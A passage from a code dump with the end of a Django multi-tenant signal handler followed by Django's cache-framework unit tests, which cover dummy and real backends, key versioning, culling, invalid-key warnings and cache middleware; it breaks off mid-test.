execute_from_command_line(['manage.py', 'migrate', f'--database={database}'])
    logger.info('migrated successfully!')
@receiver(post_save, sender=GlobalUser)
def assign_user_handler(sender, signal, instance, created, **kwargs):
if instance.tenant:
TenantUser = get_tenant_user_model()
TenantUser.objects.using(instance.tenant.code).get_or_create(
defaults={
'is_active':instance.is_active,
'is_staff':instance.is_staff,
'is_superuser':instance.is_superuser
},
username=instance.username,
)
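# Taken together, creating a Tenant provisions its database and runs migrations in a
# background thread, while saving a GlobalUser with a tenant assigned mirrors that
# account into the tenant's own database via get_or_create.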
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from unittest import mock
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertEqual(cache.get_or_set('mykey', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
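# For example (hypothetical inputs), custom_key_func('mykey', 'cacheprefix', 2)
# returns 'CUSTOM-cacheprefix-2-mykey'.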
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
    # `params` are test-specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
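# For example (hypothetical call), caches_setting_for_tests(BACKEND='x.y.DummyCache')
# yields {'default': {'BACKEND': 'x.y.DummyCache'},
#         'v2': {'BACKEND': 'x.y.DummyCache', 'VERSION': 2}, ...}: one entry per alias
# in _caches_setting_base, with `params` values overriding the per-alias defaults.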
class BaseCacheTests:
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
        Follow memcached's convention, where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
        Passing None as the timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
"""
        Passing zero as the timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
cache.set(key, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
self.assertEqual(str(w[0].message.args[0]), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
expected_warning = (
"Cache key contains characters that will cause errors if used "
"with memcached: %r" % key
)
self._perform_invalid_key_test(key, expected_warning)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
